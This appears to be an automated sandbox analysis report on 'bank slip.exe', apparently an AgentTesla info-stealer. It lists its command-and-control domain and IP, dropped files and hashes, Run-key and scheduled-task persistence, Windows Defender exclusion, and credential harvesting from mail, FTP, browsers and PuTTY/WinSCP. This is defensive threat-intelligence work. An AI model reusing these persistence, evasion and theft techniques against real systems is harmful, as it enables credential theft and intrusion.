                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1436607 Sample: bank slip.exe Startdate: 06/05/2024 Architecture: WINDOWS Score: 100 53 vw-rmplcars.co.in 2->53 55 mail.vw-rmplcars.co.in 2->55 59 Snort IDS alert for network traffic 2->59 61 Multi AV Scanner detection for domain / URL 2->61 63 Found malware configuration 2->63 65 14 other signatures 2->65 8 bank slip.exe 7 2->8         started        12 mKSjGvfmIulVB.exe 5 2->12         started        14 GUIVTme.exe 2->14         started        16 GUIVTme.exe 2->16         started        signatures3 process4 file5 49 C:\Users\user\AppData\...\mKSjGvfmIulVB.exe, PE32 8->49 dropped 51 C:\Users\user\AppData\Local\...\tmp2859.tmp, XML 8->51 dropped 81 Adds a directory exclusion to Windows Defender 8->81 18 RegSvcs.exe 1 4 8->18         started        23 powershell.exe 23 8->23         started        25 powershell.exe 23 8->25         started        27 schtasks.exe 1 8->27         started        83 Multi AV Scanner detection for dropped file 12->83 85 Machine Learning detection for dropped file 12->85 29 RegSvcs.exe 12->29         started        31 schtasks.exe 12->31         started        33 conhost.exe 14->33         started        35 conhost.exe 16->35         started        signatures6 process7 dnsIp8 57 vw-rmplcars.co.in 111.118.215.27, 49710, 49712, 587 PUBLIC-DOMAIN-REGISTRYUS India 18->57 47 C:\Users\user\AppData\Roaming\...behaviorgraphUIVTme.exe, PE32 18->47 dropped 67 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 18->67 69 Hides that the sample has been downloaded from the Internet (zone.identifier) 18->69 71 Loading BitLocker PowerShell Module 23->71 37 WmiPrvSE.exe 23->37         started        39 conhost.exe 23->39         started        41 conhost.exe 25->41         started        43 conhost.exe 27->43         started        73 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 29->73 75 Tries to steal Mail credentials (via file / registry access) 29->75 77 Tries to harvest and steal ftp login credentials 29->77 79 Tries to harvest and steal browser information (history, passwords, etc) 29->79 45 conhost.exe 31->45         started        file9 signatures10 process11

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        bank slip.exe24%ReversingLabsWin32.Trojan.Generic
                        bank slip.exe34%VirustotalBrowse
                        bank slip.exe100%Joe Sandbox ML

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe0%ReversingLabs
                        C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe0%VirustotalBrowse
                        C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe24%ReversingLabsWin32.Trojan.Generic
                        C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe38%VirustotalBrowse

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        SourceDetectionScannerLabelLink
                        vw-rmplcars.co.in11%VirustotalBrowse
                        mail.vw-rmplcars.co.in0%VirustotalBrowse

                        URLs

                        SourceDetectionScannerLabelLink
                        https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
                        http://vw-rmplcars.co.in0%Avira URL Cloudsafe
                        http://mail.vw-rmplcars.co.in0%Avira URL Cloudsafe
                        http://vw-rmplcars.co.in11%VirustotalBrowse
                        http://mail.vw-rmplcars.co.in0%VirustotalBrowse

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        vw-rmplcars.co.in
                        		111.118.215.27
                        		truetrueunknown
                        mail.vw-rmplcars.co.in
                        		unknown
                        		unknowntrueunknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://account.dyn.com/bank slip.exe, 00000000.00000002.2072649003.000000000389C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2088618533.0000000000402000.00000040.00000400.00020000.00000000.sdmp, mKSjGvfmIulVB.exe, 0000000B.00000002.2126436227.00000000042DD000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namebank slip.exe, 00000000.00000002.2071630541.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, mKSjGvfmIulVB.exe, 0000000B.00000002.2121255868.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://www.chiark.greenend.org.uk/~sgtatham/putty/0bank slip.exe, mKSjGvfmIulVB.exe.0.drfalse
                            • URL Reputation: safe
                            		unknown
                            http://mail.vw-rmplcars.co.inRegSvcs.exe, 00000009.00000002.2091471993.000000000304A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3246056841.000000000309A000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            http://vw-rmplcars.co.inRegSvcs.exe, 00000009.00000002.2091471993.000000000304A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3246056841.000000000309A000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 11%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            111.118.215.27
                            		vw-rmplcars.co.inIndia
                            		394695PUBLIC-DOMAIN-REGISTRYUStrue

                            General Information

                            Joe Sandbox version:40.0.0 Tourmaline
                            Analysis ID:1436607
                            Start date and time:2024-05-06 08:12:04 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 7m 31s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:21
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:bank slip.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@23/19@1/1
                            EGA Information:
                            • Successful, ratio: 66.7%
                            HCA Information:
                            • Successful, ratio: 95%
                            • Number of executed functions: 79
                            • Number of non-executed functions: 8
                            Cookbook Comments:
                            • Found application associated with file extension: .exe

                            Warnings

                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Execution Graph export aborted for target GUIVTme.exe, PID 7860 because it is empty
                            • Execution Graph export aborted for target GUIVTme.exe, PID 8096 because it is empty
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtCreateKey calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            08:12:49API Interceptor2x Sleep call for process: bank slip.exe modified
                            08:12:53API Interceptor39x Sleep call for process: powershell.exe modified
                            08:12:54API Interceptor53x Sleep call for process: RegSvcs.exe modified
                            08:12:54AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run GUIVTme C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
                            08:12:57Task SchedulerRun new task: mKSjGvfmIulVB path: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe
                            08:12:58API Interceptor2x Sleep call for process: mKSjGvfmIulVB.exe modified
                            08:13:08AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run GUIVTme C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            111.118.215.27SecuriteInfo.com.Win32.CrypterX-gen.8491.21939.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              SecuriteInfo.com.Win32.RATX-gen.18898.23590.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                DELIVERY CERTIFICATE.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  DHL.exeGet hashmaliciousAgentTeslaBrowse
                                    BANK SLIP.exeGet hashmaliciousAgentTeslaBrowse
                                      PO.NO.2203.exeGet hashmaliciousAgentTeslaBrowse
                                        SOA.exeGet hashmaliciousAgentTeslaBrowse
                                          5TH HIRE BANK SLIP.exeGet hashmaliciousAgentTeslaBrowse
                                            EPDA.exeGet hashmaliciousAgentTeslaBrowse
                                              BANK SLIP.exeGet hashmaliciousAgentTeslaBrowse

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                PUBLIC-DOMAIN-REGISTRYUSRFQ_MV-33660 TROYER.docGet hashmaliciousAgentTeslaBrowse
                                                • 204.11.59.228
                                                PO19176542.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 199.79.62.115
                                                SecuriteInfo.com.Win32.PWSX-gen.23212.6828.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 207.174.215.249
                                                SC-246214.docGet hashmaliciousAgentTeslaBrowse
                                                • 204.11.59.228
                                                Order No Q240419617006.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 207.174.215.249
                                                yZcecBUXN7.exeGet hashmaliciousFormBookBrowse
                                                • 119.18.54.116
                                                SecuriteInfo.com.Win32.PWSX-gen.8584.56.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 199.79.62.115
                                                SWIFT COPY.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 207.174.215.249
                                                SWIFT COPY.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 207.174.215.249
                                                H223070141&H223070191.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 162.251.85.202

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exePAYMENT LIST.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  E7236252-receipt.vbsGet hashmaliciousXWormBrowse
                                                    I7336446-receipt.vbsGet hashmaliciousXWormBrowse
                                                      S94847456-receipt.vbsGet hashmaliciousXWormBrowse
                                                        Transfer copy PDF.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                          PO# CV-PO23002552.PDF.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            Deposit payment copy PDF.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              Approved E-DO PDF.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                PO# CV-PO23002552.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                  Invoice Checklist.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GUIVTme.exe.log

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:modified
                                                                    Size (bytes):142
                                                                    Entropy (8bit):5.090621108356562
                                                                    Encrypted:false
                                                                    SSDEEP:3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
                                                                    MD5:8C0458BB9EA02D50565175E38D577E35
                                                                    SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
                                                                    SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
                                                                    SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
                                                                    Malicious:false
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\bank slip.exe.log

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\bank slip.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):1216
                                                                    Entropy (8bit):5.34331486778365
                                                                    Encrypted:false
                                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                    Malicious:false
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\mKSjGvfmIulVB.exe.log

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):1216
                                                                    Entropy (8bit):5.34331486778365
                                                                    Encrypted:false
                                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                    Malicious:false
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):2232
                                                                    Entropy (8bit):5.380747059108785
                                                                    Encrypted:false
                                                                    SSDEEP:48:lylWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMugePu/ZPUyus:lGLHxvIIwLgZ2KRHWLOugYs
                                                                    MD5:3AD8789204FA415704CCF5B3B656BBDD
                                                                    SHA1:7FE555A0FC141DAC4D994A35E788D0893ECA7890
                                                                    SHA-256:469F824997F70EF9F88D0D52BCFFC2EFCB07C561DB69FF4C65C0A7CBC7A432D1
                                                                    SHA-512:172AE94A3822D34858B725EAB261082CBF977969A46D92A7275066D0DE8C8966BA39BA3171B2048D8A2E765CE8F7EE9594F96D6E0A97897583F3559F642257CA
                                                                    Malicious:false
                                                                    Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3oyi5kdz.x4n.psm1

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4thuxtx2.vjk.ps1

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l3eehkhi.hfv.ps1

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m01qiw3h.frr.ps1

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pmjzmuuk.i3n.ps1

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_trtgj4wc.ynl.psm1

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x2slqf4y.gjd.psm1

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zs5fnrbp.zom.psm1

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\tmp2859.tmp

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\bank slip.exe
                                                                    File Type:XML 1.0 document, ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):1586
                                                                    Entropy (8bit):5.114825481024603
                                                                    Encrypted:false
                                                                    SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt/xvn:cgergYrFdOFzOzN33ODOiDdKrsuT5v
                                                                    MD5:98B0CB9F06E82A2DC5BA7B2CDF48593C
                                                                    SHA1:A9338ED94B1E59B0650809DC843A7AE6FA058C34
                                                                    SHA-256:39EC0F49FAC54622F2BBAFA62B7C9C0E7B6D9E9B474A51A5DE186D53B69766FF
                                                                    SHA-512:2B515628A5CA741AEE2C969C7D3A454A274E45A692E384CD9073CC47761BB8F73CB3DB247AA90B94692FDA0F152905F769A41690CDA382E315E61ADB8AFACE4E
                                                                    Malicious:true
                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                                                    C:\Users\user\AppData\Local\Temp\tmp4AB6.tmp

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe
                                                                    File Type:XML 1.0 document, ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):1586
                                                                    Entropy (8bit):5.114825481024603
                                                                    Encrypted:false
                                                                    SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt/xvn:cgergYrFdOFzOzN33ODOiDdKrsuT5v
                                                                    MD5:98B0CB9F06E82A2DC5BA7B2CDF48593C
                                                                    SHA1:A9338ED94B1E59B0650809DC843A7AE6FA058C34
                                                                    SHA-256:39EC0F49FAC54622F2BBAFA62B7C9C0E7B6D9E9B474A51A5DE186D53B69766FF
